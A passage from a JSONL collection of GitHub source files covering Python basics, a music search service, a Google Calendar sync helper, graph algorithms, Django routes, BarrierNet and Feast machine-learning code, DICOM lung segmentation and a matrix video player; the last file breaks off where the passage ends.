+{"seq_id":"24851150742","text":"# for 문\n# 1. 형식\n# for 변수 in 반복객체:\n# 반복실행문\n# 2. 반복객체\n# 리스트, 튜플, 세트, 사전, 문자열, 정수집합(range)\n# 3. 정수집합(range)\n# 1) range(10) : 0 ~ 9\n# 2) range(1, 10) : 1 ~ 9\n# 3) range(1, 10, 2) : 1, 3, 5, 7, 9\n\nfor a in [1, 2, 3]:\n print(a)\n\nfor b in (1, 2, 3):\n print(b)\n\nfor c in 'Hello':\n print(c)\n\nfor d in range(10):\n print(d)\n\nmy_list = [1, 2, 3, 4, 5]\nfor idx in range(len(my_list)):\n print(my_list[idx])\n\n# 이름 따로, 나이 따로 출력\nmy_list = [('에밀리', 20), ('제임스', 25)]\nfor person in my_list:\n for p in person:\n print(p)\n","repo_name":"hwangseokjin94/gitstudy","sub_path":"pythonstudy/workspace/day02/EX12_for.py","file_name":"EX12_for.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39014700329","text":"from src.schemas.response import HTTPResponses, HttpResponseModel\nfrom src.schemas.album import AlbumCreateModel\nfrom src.db.__init__ import database as db\nfrom src.service.impl.song_service import SongService\nfrom src.service.impl.album_service import AlbumService\n\n\nclass FiltersService:\n\n @staticmethod\n def get_filters(name: str = None, year: int = None, genre: str = None):\n albums_titles = set()\n songs_titles = set()\n\n if name:\n res1 = AlbumService.get_album_by_name(name)\n res2 = SongService.get_songs_by_name(name)\n res3 = SongService.get_by_artist(name)\n res4 = AlbumService.get_by_artist(name)\n\n if res1 is None:\n res1 = []\n if res2 is None:\n res2 = []\n if res3 is None:\n res3 = []\n if type(res1) is dict:\n res1 = [res1]\n if type(res2) is dict:\n res2 = [res2]\n if type(res3) is dict:\n res3 = [res3]\n\n albums_titles |= {album['id'] for album in res1}\n\n albums_titles |= {album['id'] for album in res4}\n\n songs_titles |= {song['id']\n for song in res2}\n songs_titles |= {song['id']\n for song in res3}\n if year:\n\n res1 = AlbumService.get_by_year(year)[\n 'songs']\n res2 = SongService.get_by_year(year)[\n 'songs']\n\n albums_by_year_titles = {album['id'] for album in res1}\n songs_by_year_titles = {song['id'] for song in res2}\n\n # print(albums_by_year_titles)\n # print(songs_by_year_titles)\n\n # Se o nome for fornecido, fazemos a interseção com os álbuns filtrados por nome\n if name:\n albums_titles &= albums_by_year_titles\n songs_titles &= songs_by_year_titles\n\n else:\n albums_titles = albums_by_year_titles\n songs_titles = songs_by_year_titles\n\n if genre:\n print(\"procurando por genero\")\n\n res1 = AlbumService.get_by_genre(genre)['songs']\n res2 = SongService.get_by_genre(genre)['songs']\n\n albums_by_genre_titles = {\n album['id'] for album in res1}\n songs_by_genre_titles = {song['id']\n for song in res2}\n\n # Se o nome ou ano forem fornecidos, fazemos a interseção com os álbuns já filtrados\n if name or year:\n albums_titles &= albums_by_genre_titles\n songs_titles &= songs_by_genre_titles\n\n else:\n albums_titles = albums_by_genre_titles\n songs_titles = songs_by_genre_titles\n\n # Obtendo os álbuns e músicas completos com os títulos filtrados\n all_albums = AlbumService.get_albums()\n all_songs = SongService.get_songs()\n\n albums = [album for album in all_albums if album['id'] in albums_titles]\n songs = [song for song in all_songs if song['id'] in songs_titles]\n\n # delete the id key from the response\n # for album in albums:\n # del album['id']\n # for song in songs:\n # del song['id']\n\n response = {\n 'albums': albums,\n 'songs': songs,\n }\n\n return response\n","repo_name":"lumendesp/groove-app","sub_path":"backend/src/service/impl/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"40373142172","text":"#!/usr/bin/env python3\n\nimport os\nimport pickle\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\n\nSCOPES = [\n \"https://www.googleapis.com/auth/calendar\",\n \"https://www.googleapis.com/auth/calendar.readonly\",\n]\nCREDENTIALS_FILE = \".gcal.credentials.json\"\nTOKEN_FILE = \".gcal.token.json\"\n\n\nclass GCal:\n def __init__(self):\n self.service = self.make_calendar_service()\n self.workflowy_calendar_id = self.get_calendar_id(\"workflowy\")\n\n def make_calendar_service(self):\n creds = None\n if os.path.exists(TOKEN_FILE):\n creds = Credentials.from_authorized_user_file(TOKEN_FILE, SCOPES)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES\n )\n creds = flow.run_local_server(port=0)\n with open(TOKEN_FILE, \"w\") as token:\n token.write(creds.to_json())\n return build(\"calendar\", \"v3\", credentials=creds)\n\n def get_calendar_id(self, calendar_name):\n calendar_list = self.service.calendarList().list(pageToken=None).execute()\n for calendar_list_entry in calendar_list[\"items\"]:\n if calendar_list_entry[\"summary\"] == \"workflowy\":\n return calendar_list_entry[\"id\"]\n raise Exception(\"workflowy calendar not found\")\n\n def get_events(self):\n events_result = (\n self.service.events()\n .list(calendarId=self.workflowy_calendar_id, maxResults=10)\n .execute()\n )\n return events_result.get(\"items\", [])\n\n def get_event(self, uuid):\n uuid = uuid.replace(\"-\", \"\")\n try:\n return (\n self.service.events()\n .get(calendarId=self.workflowy_calendar_id, eventId=uuid)\n .execute()\n )\n except:\n return None\n\n def insert_event(self, uuid, summary, start, end):\n print(f\"inserting event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().insert(\n calendarId=self.workflowy_calendar_id, body=event\n ).execute()\n # print(f\"Event created: {event.get('htmlLink')}\")\n\n def update_event(self, uuid, summary, start, end):\n print(f\"update event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().update(\n calendarId=self.workflowy_calendar_id, eventId=uuid, body=event\n ).execute()\n","repo_name":"nhardt/workflowy-to-google-calendar","sub_path":"lib/GCal.py","file_name":"GCal.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13800480195","text":"from chapter1.Bag import Bag\n\n\nclass EdgeWeightedGraph:\n def __init__(self, V):\n \"\"\"\n Args:\n V: int, 顶点总数\n \"\"\"\n self.V = V\n self.E = 0\n self.adj = [Bag() for _ in range(V)]\n\n def add_edge(self, e):\n \"\"\"\n Args:\n e: Edge\n \"\"\"\n v = e.either()\n w = e.other(v)\n self.adj[v].add(e)\n self.adj[w].add(e)\n self.E += 1\n\n def edges(self):\n \"\"\"\n Return:\n Iterable\n \"\"\"\n b = Bag()\n for v in range(self.V):\n for e in self.adj[v]:\n if e.other(v) > v:\n b.add(e)\n return b ","repo_name":"AiZhanghan/Algorithms-Fourth-Edition","sub_path":"code/chapter4/EdgeWeightedGraph.py","file_name":"EdgeWeightedGraph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1998341823","text":"from django.conf.urls import patterns, url, include\nfrom django.views.generic import TemplateView\n\nurlpatterns=patterns('home.views',\n #HOME\n url(r'^$','index_view', name='vista_principal'),\n #estaticos\n url(r'^humans.txt$', TemplateView.as_view(template_name='statics/humans.txt', content_type='text/plain; charset=utf-8')),\n url(r'^robots.txt$', TemplateView.as_view(template_name='statics/robots.txt', content_type='text/plain; charset=utf-8')),\n url(r'^sitemap.xml$', TemplateView.as_view(template_name='statics/sitemap.xml', content_type='application/xml; charset=utf-8')),\n #secciones\n url(r'^lo-que-hacemos/$', 'loqueHacemos'),\n url(r'^lo-que-hacemos/ux-ui-design/$', 'uxDesign'),\n url(r'^lo-que-hacemos/ecommerce/$', 'eCommerce'),\n url(r'^lo-que-hacemos/websites/$', 'webSites'),\n url(r'^lo-que-hacemos/marketing-online/$', 'marketingOnline'),\n url(r'^lo-que-hacemos/aplicaciones-web/$', 'appWeb'),\n #secciones\n url(r'^nuestro-trabajo/$', 'portafolio'),\n url(r'^contacto/$', 'contacto'),\n url(r'^about-us/$', 'aboutUS'),\n url(r'^expo-guadalajara/$', 'landing'),\n\n #Equipo y sus paginas.\n url(r'^team/$', 'team'),\n url(r'^alen/$', 'alen'),\n url(r'^jesus/$', 'chucho'),\n url(r'^luciano/$', 'luciano'),\n #REDirects\n url(r'^blog/$', 'blogRedirect'),\n url(r'^facebook/$', 'facebookRedirect'),\n url(r'^twitter/$', 'twitterRedirect'),\n url(r'^g\\+/$', 'gplusRedirect'),\n url(r'^map/$', 'blogRedirect'),\n url(r'^fcq/$', 'blogRedirect'),\n\n)","repo_name":"xtornasol512/phyro","sub_path":"back-end/phyro/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3689181864","text":"import torch\nimport torch.nn as nn\nfrom my_classes import Dataset_list as Dataset\nimport scipy.io as sio\nimport models\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nplt.style.use('bmh')\n\nbarriernet = 1\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Using {} device\".format(device))\ntorch.backends.cudnn.benchmark = True\n\n\n# Datasets from mat\ntrain_data = sio.loadmat('data/data_train_ocbf.mat')\ntrain_data = train_data['data_train_ocbf'] # data_train for oc controller\ntest_data = sio.loadmat('data/data_test_ocbf.mat')\ntest_data = test_data['data_test_ocbf'] # data_test for oc controller\nimpl_data = sio.loadmat('data/data_ip.mat')\nimpl_data = impl_data['data_ip']\n\ntrain0 = np.float32(train_data[:,0:4]) # x_ip, v_ip, x_i, v_i\ntrain_labels = np.reshape(np.float32(train_data[:,4]), (len(train_data),1))\ntest0 = np.float32(test_data[:,0:4])\ntest_labels = np.reshape(np.float32(test_data[:,4]), (len(test_data),1))\nimpl0 = np.float32(impl_data)\ninit = train0[0]\n\n# data normalization\nmean = np.mean(train0, axis = 0)\nstd= np.std(train0, axis = 0)\ntrain0 = (train0 - mean)/std\ntest0 = (test0 - mean)/std\nimpl0 = (impl0 - mean)/std\n\n\n# Parameters\nparams = {'batch_size': 32,\n 'shuffle': True,\n 'num_workers': 12}\n\n# Generators\ntraining_set = Dataset(train0, train_labels)\ntrain_dataloader = torch.utils.data.DataLoader(training_set, **params)\n\ntest_set = Dataset(test0, test_labels)\ntest_dataloader = torch.utils.data.DataLoader(test_set, **params)\n\n\n# Initialize the model.\nnFeatures, nHidden1, nHidden21, nHidden22, nCls = 4, 72, 24, 24, 1\nif (barriernet == 1):\n model = models.BarrierNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nelse:\n model = models.FCNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nprint(model)\n\n# Initialize the optimizer.\nlearning_rate = 1e-3\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) #Adam\nloss_fn = nn.MSELoss()\n\n\ndef train(dataloader, model, loss_fn, optimizer, losses):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n \n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n losses.append(loss.item())\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 25 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n return losses\n\ndef test(dataloader, model, loss_fn, losses):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n loss = loss_fn(pred, y)\n test_loss += loss.item()\n test_loss /= num_batches\n losses.append(test_loss)\n print(f\"Test avg loss: {test_loss:>8f} \\n\")\n return losses\n\n \nepochs = 20 \ntrain_losses, test_losses = [], []\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train_losses = train(train_dataloader, model, loss_fn, optimizer, train_losses)\n test_losses = test(test_dataloader, model, loss_fn, test_losses)\nprint(\"Training Done!\")\n\n\n#save model\nif (barriernet == 1):\n 
torch.save(model.state_dict(), \"model_ocbf_bn.pth\")\nelse:\n torch.save(model.state_dict(), \"model_ocbf_fc.pth\")\nprint(\"Saved PyTorch Model State to xx.pth\")\n\n\n# on the test dataset\nmodel.eval()\npredic, actual, t = [], [], []\nt0 = 0\n\nwith torch.no_grad():\n for i in range(len(test0)):\n x, y = Variable(torch.from_numpy(test0[i]), requires_grad=False), test_labels[i]\n x = torch.reshape(x, (1,nFeatures))\n x = x.to(device)\n pred = model(x)\n predic.append(pred.item())\n actual.append(y)\n t.append(t0)\n t0 = t0 + 0.06\nprint(\"Test done!\") \n\npos, vel = init[2], init[3]\ntr, tr0 = [], 0\nimplem, safety, lb = [], [], []\ndt = 0.1\n\n# running on a vehicle\nwith torch.no_grad():\n for i in range(0,len(impl0),10):\n #normalize\n x = (pos - mean[2])/std[2]\n v = (vel - mean[3])/std[3]\n x_ip = impl0[i,0]*std[0] + mean[0] #recover\n #get safety metric\n safe = (x_ip - pos)/vel\n safety.append(safe)\n lb.append(1.8)\n #prepare for model input\n impl0[i,2] = x\n impl0[i,3] = v\n x_r = Variable(torch.from_numpy(impl0[i]), requires_grad=False)\n x_r = torch.reshape(x_r, (1,nFeatures))\n x_r = x_r.to(device)\n ctrl = model(x_r)\n \n #integrate dynamics\n pos = pos + vel*dt + 0.5*ctrl.item()*dt*dt\n vel = vel + ctrl.item()*dt\n \n implem.append(ctrl.item())\n tr.append(tr0)\n tr0 = tr0 + dt\nprint(\"Implementation done!\")\n \n\nplt.figure(1)\nplt.plot(t, predic, color = 'green', label = 'predicted')\nplt.plot(t, actual, color = 'red', label = 'actual(optimal)')\nplt.plot(tr, implem, color = 'blue', label = 'implemented')\nplt.legend()\nplt.ylabel('Control')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('control_ocbf_bn.png')\n\nplt.figure(2) \nplt.plot(train_losses, color = 'green', label = 'train')\nplt.plot(test_losses, color = 'red', label = 'test')\nplt.legend()\nplt.ylabel('Loss')\nplt.xlabel('time')\nplt.ylim(ymin=0.)\nplt.show()\n# plt.savefig('Loss_ocbf_bn.png')\n\nplt.figure(3) \nplt.plot(tr, safety, color = 'green', label = 'safety')\nplt.plot(tr, lb, color = 'red', label = 'lower bound')\nplt.legend()\nplt.ylabel('Safety')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('Safety_ocbf_bn.png')\n\nprint(\"end\")","repo_name":"Weixy21/BarrierNet","sub_path":"Merging/merging-barriernet.py","file_name":"merging-barriernet.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"}
+{"seq_id":"15062894600","text":"import pickle\nimport glob\nimport numpy as np\nimport sortedcontainers as sc\nfrom cloud_as_function import CloudAsFunction\nfrom multiprocessing import Process, Queue\n\n\ndef add_game(used_set, player, game):\n if used_set[player] is None:\n used_set[player] = []\n used_set[player].append(game)\n\n\ndef compare_to(valid_function, knn_set, k):\n sorted_list = sc.SortedList()\n for player, functions in knn_set.items():\n for unique_function in functions:\n try:\n score = valid_function.custom_distance_with(unique_function)\n if score < CloudAsFunction.theoric_max:\n sorted_list.add((score, player))\n except Exception as e:\n raise e\n \n player_count = {}\n for (score, player) in sorted_list[:k]:\n if player not in player_count.keys():\n player_count[player] = [0, 77777]\n player_count[player][0] += 1\n player_count[player][1] = min(score, player_count[player][1])\n \n max_score = 666666\n max_count = 0\n max_player = \"\"\n\n for player, element in player_count.items():\n count = element[0]\n score = element[1]\n if max_count < count:\n max_player = player\n max_count = count\n max_score = score\n elif max_count == count:\n if max_score > score:\n max_player = player\n max_score = score\n return max_player, max_score\n\n\ndef split(game_set, folds=10, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n i = 0\n for i in range(folds):\n functions_train_set = dict.fromkeys(games.keys())\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, CloudAsFunction(game, weights))\n else:\n add_game(functions_train_set, player, CloudAsFunction(game, weights))\n \n for player, games_of_him in functions_train_set.items():\n try:\n functions_train_set[player] = [CloudAsFunction.aggregate(games_of_him)]\n except Exception:\n print('cannot aggregate player, doesn\\'t do anything then, pass')\n raise\n \n yield functions_train_set, functions_validation_set\n return\n\n\ndef split_valid(game_set, folds=4):\n for i in range(folds):\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n if games_of_him is None:\n continue\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, game)\n else:\n continue\n \n yield functions_validation_set\n return\n\n\ndef run(functions_train_set, functions_validation_set, q):\n correct = 0\n incorrect = 0\n for key, value in functions_validation_set.items():\n if value is None:\n continue\n for one_game in value:\n try:\n prediction, score = compare_to(one_game, functions_train_set, 1)\n if key == prediction:\n correct += 1\n else:\n incorrect += 1\n except IndexError:\n continue\n q.put((correct, incorrect))\n\n\ndef simulate(games_dict, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n correct = 0\n incorrect = 0\n\n q_list = []\n\n print(\": begin splitting\")\n sets = split(games_dict, 10, weights)\n \n print(\": begin testing\")\n for i, (functions_train_set, functions_validation_set) in enumerate(sets):\n print(\": compute score fold {}\".format(i))\n computing = []\n valid_sets = split_valid(functions_validation_set)\n \n for sub_valid_set in valid_sets:\n 
q_list.append(Queue())\n computing.append(Process(target=run, args=(functions_train_set, sub_valid_set, q_list[-1])))\n computing[-1].start()\n for t, q in zip(computing, q_list):\n c, inc = q.get()\n correct += c\n incorrect += inc\n t.join()\n break\n return correct / (correct + incorrect)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n games = {}\n\n print(\": loading games\")\n\n for filename in glob.iglob('.\\small functions bt\\*.dat'):\n with open(filename, 'rb') as f:\n games[filename[18:-4]] = pickle.load(f)\n\n bef_value = -1\n conseq_desc = 0\n for i in range(5, 51, 5):\n CloudAsFunction.window = i\n value = simulate(games, weights=np.asarray([1, 121, 121, 121, 101, 101, 1]))\n if value < bef_value:\n conseq_desc += 1\n else:\n conseq_desc = 0\n if conseq_desc >= 5:\n break\n bef_value = value\n print(\"for window = {}, success is : {}\".format(i, value))\n print(\"for step = {}, success is : {}\".format(i, value))\n\n\n","repo_name":"gegeAi/fdcompo","sub_path":"optimize_interval.py","file_name":"optimize_interval.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33720995340","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport pydicom as dicom \nimport os\nfrom skimage.segmentation import clear_border\n\npath = \".\\scans\"\nsegmentation = []\nimagens = []\nseg_aux_paths = []\npaths_seg = []\npaths_img = []\n\ndef display(display_list):\n plt.figure(figsize=(15, 15))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.show()\n\ndef sort_list(list_str):\n x=[]\n dig=\"0123456789\"\n for i in list_str:\n p=\"\"\n for j in i:\n if j in dig:\n p+=j\n x.append(int(p))\n y=[]\n y.extend(x)\n x.sort()\n res=[]\n for i in x:\n res.append(list_str[y.index(i)])\n return res\n\ndef get_images_dir(path):\n for root, dirs, files in os.walk(path):\n files.sort()\n for file in files:\n relativePath = os.path.join(root, file)\n if('lung_mask' in relativePath):\n seg_aux_paths.append(relativePath)\n else:\n paths_img.append(relativePath)\n\n if('lung_mask' in root):\n aux_name = sort_list(seg_aux_paths)\n seg_aux_paths.clear()\n for filepath in aux_name:\n paths_seg.append(filepath)\n\ndef get_images(path):\n get_images_dir(path)\n print(len(paths_seg), len(paths_img))\n for i in range(len(paths_seg)):\n path_image, path_mask = paths_seg[i], paths_img[i]\n segmentation.append(dicom.dcmread(path_image).pixel_array)\n imagens.append(dicom.dcmread(path_mask).pixel_array)\n\nget_images(path)\n\npred = []\n\ndef normalize_canais(input_image):\n input_image = np.stack((input_image,)*1, axis=-1)\n return input_image\n\nkernel = np.ones((14, 14), 'uint8')\nkernel2 = np.ones((12, 12), 'uint8')\nfor i in range(len(segmentation)):\n \n img = normalize_canais(imagens[i])\n\n filtro = cv2.medianBlur(img, 5)\n erode_img = cv2.erode(filtro, kernel2, iterations=1)\n dilate_img = cv2.dilate(erode_img, kernel, iterations=1)\n # Aplica uma limiarização para binarizar a imagem\n ret, thresh = cv2.threshold(dilate_img, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n mask = np.vectorize(clear_border, signature='(n,m)->(n,m)')(thresh)\n\n pred.append(mask)\n #para ver de maneira visual a segmentacao\n #display([imagens[i], segmentation[i], mask])\n\ndef get_metrics_pixel_to_pixel(true, predict):\n fn = 0\n tp = 0\n tn = 0\n fp = 0\n for index in range(len(predict)):\n for indexInside in range(len(predict[index])):\n for indexDeep in range(len(predict[index][indexInside])):\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 255:\n tp += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 0:\n tn += 1\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 0:\n fn += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 255:\n fp += 1\n \n return fn, tp, tn, fp\n\nfn, tp, tn, fp = get_metrics_pixel_to_pixel(segmentation, pred)\nprecision = tp / (tp + fp)\nrecall = tp / (tp + fn)\nF1_score = 2 * (precision * recall) / (precision + recall)\ndice_Coefficient = 2 * tp / (2*tp + fp + fn)\nacuracia = (tp + tn) / (tp + fp + fn + tn)\nprint(\"False Negative: \" + str(fn) + \" True Negative: \" + str(fp))\nprint(\"False Positive: \" + str(tp) + \" True Positive: \" + str(tn))\nprint(\"Precision: \" + str(precision))\nprint(\"recall: \" + str(recall))\nprint(\"F1_score: \" + str(F1_score))\nprint(\"Dice Coefficient: \" + 
str(dice_Coefficient))\nprint(\"acuracia: \" + str(acuracia))\n\n\n","repo_name":"josepedroso/segmented_dicom_images","sub_path":"segmenta.py","file_name":"segmenta.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2584126987","text":"#!/usr/bin/env python3\nimport fbmatrix\nimport argparse\nimport time\nimport assembly.yuv420\nfrom ffpyplayer.player import MediaPlayer\nimport numpy as np\nfrom pyrr import Matrix44\n\ndef render():\n global bytearray, player\n global args\n \n videoAspect = screenAspect = args.columns/args.rows\n \n frame, val = player.get_frame()\n\n if frame:\n img, t = frame\n\n data = img.to_bytearray()\n size = img.get_size()\n \n videoAspect = size[0]/size[1]\n \n bytearray.setYUV420(data, size[0], size[1])\n\n time.sleep(val)\n\n M = np.eye(4, dtype=np.float32)\n\n if not args.stretch:\n if args.fit:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1))\n\n bytearray.setProjection(M)\n bytearray.render()\n\nimport common\n\nparser = argparse.ArgumentParser(description='Framebuffer RGB matrix player')\ncommon.add_args(parser)\nparser.add_argument('--fit', action='store_true', help='Fit the video as large as it can but maintaining aspect ratio. This means some part will be cut off')\nparser.add_argument('--stretch', action='store_true', help='Stretch the video to fit the screen exactly, which means aspect ratio will not be preserved. I really hate it when people do this.')\nparser.add_argument('videofile', help='Video to play')\n\nargs = parser.parse_args()\n\nplayer = MediaPlayer(args.videofile, ff_opts={'out_fmt':'yuv420p'})\n\nmatrix = common.renderer_from_args(args)\n\nbytearray = assembly.yuv420.bytearray(supersample = args.supersample)\n\nmatrix.run(render)\n","repo_name":"sharky5102/fbmatrix","sub_path":"fbmplay.py","file_name":"fbmplay.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"21007684308","text":"from datetime import timedelta\n\nimport pandas as pd\nfrom feast import (\n FeatureView,\n Field,\n)\nfrom feast.on_demand_feature_view import on_demand_feature_view\nfrom feast.types import Float32, Float64, String\n\nfrom data_sources import *\nfrom entities import *\n\ndriver_hourly_stats_view = FeatureView(\n name=\"driver_hourly_stats\",\n description=\"Hourly features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"conv_rate\", dtype=Float32),\n Field(name=\"acc_rate\", dtype=Float32),\n ],\n online=True,\n source=driver_stats,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\ndriver_daily_features_view = FeatureView(\n name=\"driver_daily_features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"daily_miles_driven\", dtype=Float32),\n Field(name=\"lat\", dtype=Float32),\n Field(name=\"lon\", dtype=Float32),\n ],\n online=True,\n source=driver_stats_push_source,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\n\n# Define an on demand feature view which can generate new features based on\n# existing feature views and RequestSource features\n@on_demand_feature_view(\n sources=[driver_hourly_stats_view, val_to_add_request],\n schema=[\n Field(name=\"conv_rate_plus_val1\", dtype=Float64),\n Field(name=\"conv_rate_plus_val2\", dtype=Float64),\n ],\n)\ndef transformed_conv_rate(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"conv_rate_plus_val1\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add\"]\n df[\"conv_rate_plus_val2\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add_2\"]\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=\"avg_hourly_miles_driven\", dtype=Float64),],\n)\ndef avg_hourly_miles_driven(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"avg_hourly_miles_driven\"] = inputs[\"daily_miles_driven\"] / 24\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=f\"geohash_{i}\", dtype=String) for i in range(1, 7)],\n)\ndef location_features_from_push(inputs: pd.DataFrame) -> pd.DataFrame:\n import pygeohash as gh\n\n df = pd.DataFrame()\n df[\"geohash\"] = inputs.apply(lambda x: gh.encode(x.lat, x.lon), axis=1).astype(\n \"string\"\n )\n\n for i in range(1, 7):\n df[f\"geohash_{i}\"] = df[\"geohash\"].str[:i].astype(\"string\")\n return df\n","repo_name":"feast-dev/feast-workshop","sub_path":"module_2/feature_repo/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"}
+{"seq_id":"24404239521","text":"import torch.nn as nn\nimport torch\nfrom timm.models.layers import trunc_normal_\nfrom torch.nn import functional as F\nin_place = True\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=0.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\ndef unpadding(y, target_size):\n H, W = target_size\n H_pad, W_pad = y.size(2), y.size(3)\n extra_h = H_pad - H\n extra_w = W_pad - W\n if extra_h > 0:\n y = y[:, :, :-extra_h]\n if extra_w > 0:\n y = y[:, :, :, :-extra_w]\n return y\nclass Conv3d(nn.Conv3d):\n\n def __init__(self, in_channels, out_channels, kernel_size, stride=(1,1,1), padding=(0,0,0), dilation=(1,1,1), groups=1, bias=False):\n super(Conv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2, keepdim=True).mean(dim=3, keepdim=True).mean(dim=4, keepdim=True)\n weight = weight - weight_mean\n std = torch.sqrt(torch.var(weight.view(weight.size(0), -1), dim=1) + 1e-12).view(-1, 1, 1, 1, 1)\n 